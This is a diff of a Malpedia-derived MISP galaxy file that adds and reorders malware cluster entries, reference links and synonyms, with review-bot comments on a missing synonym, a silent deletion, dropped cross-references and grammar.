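Review bot: the new Typhon Stealer entry lists only "Typhon Reborn V2" under `synonyms`, while its own description introduces the names "Typhon Reborn" and "TyphonReborn". Consider adding those two as well so that the aliases used in the description are tag-searchable.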
@@ -45839,8 +48319,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos",
- "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns",
- "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html"
+ "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html",
+ "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns"
],
"synonyms": [],
"type": []
@@ -46213,19 +48693,6 @@
"uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65",
"value": "Unidentified 061"
},
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063",
- "https://twitter.com/KevinPerlow/status/1160766519615381504"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "d34ac949-3816-436b-a719-b4ced192388e",
- "value": "Unidentified 063 (Lazarus Keylogger)"
- },
{
"description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.",
"meta": {
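Review bot: this hunk deletes the "Unidentified 063 (Lazarus Keylogger)" cluster (uuid d34ac949-3816-436b-a719-b4ced192388e) outright. Any MISP event already tagged with that uuid loses its galaxy resolution; if the entry was merged or renamed upstream, keeping a stub that points to the successor, or an explicit deprecation, is safer than a silent removal. Also visible in the trailing context: the next entry's description reads "c2 sever" where "c2 server" is meant.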
@@ -46349,8 +48816,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076",
"https://www.youtube.com/watch?v=8x-pGlWpIYI",
- "https://www.zscaler.com/blogs/research/return-higaisa-apt",
- "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html"
+ "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
+ "https://www.zscaler.com/blogs/research/return-higaisa-apt"
],
"synonyms": [],
"type": []
@@ -46467,9 +48934,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089",
- "https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/"
+ "https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/",
+ "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/"
+ ],
+ "synonyms": [
+ "5.t Downloader"
],
- "synonyms": [],
"type": []
},
"uuid": "685c9c30-aa9f-43ee-a262-43c17c350049",
@@ -46480,7 +48950,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_090",
- "https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/"
+ "https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html"
],
"synonyms": [],
"type": []
@@ -46540,6 +49011,130 @@
"uuid": "db8f94e9-768d-4ad1-befb-55b4b820174f",
"value": "Unidentified 094"
},
+ {
+ "description": "Wiper, using EldoS RawDisk for low level access to disks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-264a-iranian-cyber-actors-conduct-cyber-operations-against-the-government-of-albania.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-264a"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "925f7a39-9674-4209-a31a-e09c27117328",
+ "value": "Unidentified 095 (Iranian Wiper)"
+ },
+ {
+ "description": "Keylogger.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0c87cf0d-fa54-4962-817d-eac4c817b21a",
+ "value": "Unidentified 096 (Keylogger)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_097",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "32fe5b04-1af6-4696-a329-604a9f637c85",
+ "value": "Unidentified 097 (Polonium Keylogger)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098",
+ "https://ti.qianxin.com/blog/articles/analysis-of-apt29%27s-attack-activities-against-italy/",
+ "https://www.freebuf.com/articles/paper/339618.html",
+ "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/",
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "db87fd2d-08ff-431d-86b8-35e31c9fcc9b",
+ "value": "Unidentified 098 (APT29 Slack Downloader)"
+ },
+ {
+ "description": "This malware uses DropBox for C2 and was spread via spear-phishing attack at government organizations. It is different from win.boombox, which is another APT29 attributed malware using DropBox (written in .NET).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "541a0a05-5c7f-4646-a96b-a4d26d5fa89d",
+ "value": "Unidentified 099 (APT29 Dropbox Loader)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_100",
+ "https://mp.weixin.qq.com/s/Hzq4_tWmunDpKfHTlZNM-A"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0ee92ce5-e33d-4393-a466-6b5f6a1ca6a5",
+ "value": "Unidentified 100 (APT-Q-12)"
+ },
+ {
+ "description": "Potential Lazarus sample.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101",
+ "https://twitter.com/RedDrip7/status/1595365451495706624"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cca4f240-ac69-437e-b02a-5483ebef5087",
+ "value": "Unidentified 101 (Lazarus?)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102",
+ "https://labs.k7computing.com/index.php/the-donot-apt/",
+ "https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6d22d9e1-b38d-4a6f-a4bb-1121ced4adfc",
+ "value": "Unidentified 102 (Donot)"
+ },
+ {
+ "description": "A malware that uses .NET to load unmanaged (shell)code which has some resemblance to BADHATCH, the IP found in the sample was referred to in coverage on WHITERABBIT ransomware attacks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103",
+ "https://otx.alienvault.com/pulse/61e7f74a936eea5d44026b8e"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "07106811-cd07-4d05-906d-c05208758b00",
+ "value": "Unidentified 103 (FIN8)"
+ },
{
"description": "",
"meta": {
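Review bot: of the nine Unidentified 095 to 103 entries added here, 097, 098, 100 and 102 ship with an empty description even though their values carry an attribution in parentheses (Polonium, APT29, APT-Q-12, Donot); a one-line description repeating that attribution would make the entries usable on their own. The Unidentified 103 description is also a run-on sentence; suggest splitting it after "BADHATCH" ("... some resemblance to BADHATCH. The IP found in the sample was referred to in coverage on WHITERABBIT ransomware attacks.").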
@@ -46559,8 +49154,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.upas",
- "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html",
- "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/"
+ "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
+ "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html"
],
"synonyms": [
"Rombrast"
@@ -46575,23 +49170,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre",
+ "https://secrary.com/ReversingMalware/Upatre/",
"https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/",
"https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/",
- "https://secrary.com/ReversingMalware/Upatre/"
+ "https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "99d9110d-85a4-4819-9f85-05e4b73aa5f3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0",
"value": "Upatre"
},
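Review bot: this hunk removes the whole `related` block from Upatre (the "similar" link to uuid 99d9110d-85a4-4819-9f85-05e4b73aa5f3), and the Vawtrak hunk further down drops its `related` link to e95dd1ba-7485-4c02-bf2e-14beedbcf053 in the same way. If these cross-references were maintained by hand, a regeneration from Malpedia silently discards them; either the generator should carry existing `related` entries over, or the removal should be stated as intentional in the commit message.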
@@ -46612,20 +49199,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
- "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
- "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
- "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA",
- "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
- "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/",
- "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/",
- "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
- "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
"https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/",
+ "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
"https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/",
- "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
+ "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
+ "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
+ "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
+ "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
"https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much"
+ "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA",
+ "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
+ "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features"
],
"synonyms": [
"Bebloh",
@@ -46641,21 +49228,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos",
- "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation",
- "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
- "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
- "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/",
- "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
"https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg",
- "https://artemonsecurity.com/uroburos.pdf",
+ "https://artemonsecurity.com/snake_whitepaper.pdf",
+ "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/",
+ "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
"https://www.secureworks.com/research/threat-profiles/iron-hunter",
"https://www.circl.lu/pub/tr-25/",
- "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
- "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://exatrack.com/public/Uroburos_EN.pdf",
"https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
- "https://exatrack.com/public/Uroburos_EN.pdf"
+ "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/",
+ "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
+ "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
+ "https://artemonsecurity.com/uroburos.pdf",
+ "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation",
+ "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots"
],
"synonyms": [
"Snake"
@@ -46670,9 +49259,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit",
- "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view",
"https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://securelist.com/cycldek-bridging-the-air-gap/97157/"
+ "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
+ "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view"
],
"synonyms": [],
"type": []
@@ -46685,9 +49274,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry",
- "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/",
"https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/"
+ "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf"
],
"synonyms": [],
"type": []
@@ -46700,8 +49289,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist",
- "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
- "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/"
+ "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf"
],
"synonyms": [],
"type": []
@@ -46727,9 +49316,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault",
+ "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
"https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
"type": []
@@ -46750,13 +49339,30 @@
"uuid": "5bb80b4a-d304-460a-bb07-417dea64f213",
"value": "vanillarat"
},
+ {
+ "description": "According to Mandiant, VaporRage or BOOMMIC, is a shellcode downloader written in C that communicates over HTTPS. Shellcode Payloads are retrieved from a hardcoded C2 that uses an encoded host_id generated from the targets domain and account name. BOOMMIC XOR decodes the downloaded shellcode payload in memory and executes it.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58"
+ ],
+ "synonyms": [
+ "BOOMMIC"
+ ],
+ "type": []
+ },
+ "uuid": "5a76d7a1-486e-4f4e-9e23-e544ee9f2ef9",
+ "value": "VaporRage"
+ },
{
"description": "In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky",
- "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/",
- "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/"
+ "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/",
+ "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/"
],
"synonyms": [],
"type": []
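Review bot: the new VaporRage description needs a grammar pass: "VaporRage or BOOMMIC, is" should be "VaporRage, or BOOMMIC, is", "Shellcode Payloads" should not be capitalised mid-sentence, and "targets domain" should be "target's domain". Minor, but this text is rendered verbatim in the galaxy UI.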
@@ -46769,17 +49375,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
- "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/",
"https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
+ "https://medium.com/@Ilandu/vawtrak-malware-824818c1837",
+ "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
+ "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/",
+ "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://www.secureworks.com/research/dyre-banking-trojan",
"https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf",
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://www.secureworks.com/research/dyre-banking-trojan",
"https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak",
- "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"Catch",
@@ -46788,15 +49395,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "e95dd1ba-7485-4c02-bf2e-14beedbcf053",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b662c253-5c87-4ae6-a30e-541db0845f67",
"value": "Vawtrak"
},
@@ -46807,7 +49405,9 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.veeam",
"https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger"
],
- "synonyms": [],
+ "synonyms": [
+ "Eamfo"
+ ],
"type": []
},
"uuid": "f85bbceb-dc51-4c11-93a6-21a72255dcaf",
@@ -46818,11 +49418,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker",
- "https://twitter.com/malwrhunterteam/status/1093136163836174339",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
"https://twitter.com/malwrhunterteam/status/1095024267459284992",
"https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/"
+ "https://twitter.com/malwrhunterteam/status/1093136163836174339",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
],
"synonyms": [
"Buran",
@@ -46846,14 +49446,27 @@
"uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f",
"value": "Velso"
},
+ {
+ "description": "Ransomware, which appears to be a rebranding of win.cuba.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2023/03/ransomware-review-march-2023"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bd774e26-f558-444b-abe6-c75868374d5e",
+ "value": "Vendetta"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.venom",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
"https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/",
- "https://blog.malwarelab.pl/posts/venom/"
+ "https://blog.malwarelab.pl/posts/venom/",
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html"
],
"synonyms": [],
"type": []
@@ -46867,6 +49480,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk",
"https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
+ "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
"https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
],
"synonyms": [],
@@ -46906,9 +49522,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin",
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
"https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
- "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html"
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
],
"synonyms": [],
"type": []
@@ -46917,7 +49533,7 @@
"value": "Vermin"
},
{
- "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.",
+ "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protected by VMProtect.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder",
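Review bot: the Vflooder description fix stops one typo short; the same sentence still reads "The impact on these services are negligible", which should be "is negligible" (singular "impact"). Since this hunk already touches that exact line to change "protectd" to "protected", fold the agreement fix into it rather than leaving a second one-line edit for a later pass.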
@@ -46934,12 +49550,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/",
"https://twitter.com/GrujaRS/status/1241657443282825217",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html"
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html",
+ "https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
],
"synonyms": [],
"type": []
@@ -46952,9 +49568,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
"https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/",
"https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/",
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
"https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/"
],
"synonyms": [],
@@ -46968,40 +49584,59 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar",
- "https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html",
- "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html",
- "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
- "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk",
- "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
- "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/",
- "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal",
- "https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing",
- "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
- "https://asec.ahnlab.com/en/30445/",
